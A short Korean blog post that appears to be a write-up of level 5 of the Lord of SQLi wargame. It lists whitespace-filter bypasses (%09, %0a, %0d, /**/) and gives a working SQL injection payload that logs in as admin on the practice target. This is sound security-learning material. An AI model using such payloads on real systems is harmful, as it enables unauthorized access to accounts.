본문 바로가기
웹 해킹/lord of SQL

los 5번

by sonysame 2018. 6. 27. 
query : {$query}

"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "
Hello {$result[id]}
"; 
  if($result['id'] == 'admin') solve("wolfman"); 
  highlight_file(__FILE__); 
?>

공백 우회


1. Tab %09

2. \n %0a

3. %0d

4. /**/

5. ()

6. +


여기서는 1, 2, 3, 4번 다 적용되었다.



1'%09or%09id='admin


query : select id from prob_wolfman where id='guest' and pw='1' or id='admin'

저작자표시

'웹 해킹 > lord of SQL' 카테고리의 다른 글

los 7번  (0) 2018.06.28
los 6번  (0) 2018.06.27
los 4번  (0) 2018.06.27
los 3번  (0) 2018.06.27
los 2번  (0) 2018.06.27

관련글

티스토리툴바